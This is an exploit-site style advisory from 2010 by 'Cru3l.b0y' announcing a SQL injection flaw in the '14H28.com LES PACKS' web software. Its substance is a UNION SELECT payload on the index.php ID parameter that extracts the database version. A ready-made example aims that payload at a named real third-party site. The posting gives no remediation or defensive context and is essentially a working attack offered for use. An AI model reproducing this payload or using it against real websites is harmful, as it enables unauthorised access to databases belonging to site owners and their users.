In The Name Of GOD ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ + + + 14H28.com LES PACKS SQL Injection Vulnerability + + + + Discovered by Cru3l.b0y + + + + + ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ [+] Exploit Title: 14H28.com LES PACKS SQL Injection Vulnerability [+] Date: 2010-10-24 [+] Author : Cru3l.b0y [+] Software Link: http://www.14h28.com/offres-e-publicite-14h28.php [+] Tested on: Ubuntu 10.10 [+] Contact : Cru3l.b0y@gmail.com [+] Website : WwW.PenTesters.IR [+] Greeting: Behzad, Ahmad, Hosein, Arash, ... +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ [+] Exploit : index.php?Page=articles&ID=-1+union+select+1,2,@@version,4,5,6,7,8,9,10,11,12,13,14,15 [+] Example : http://www.lensois.com/index.php?Page=articles&ID=-1+union+select+1,2,@@version,4,5,6,7,8,9,10,11,12,13,14,15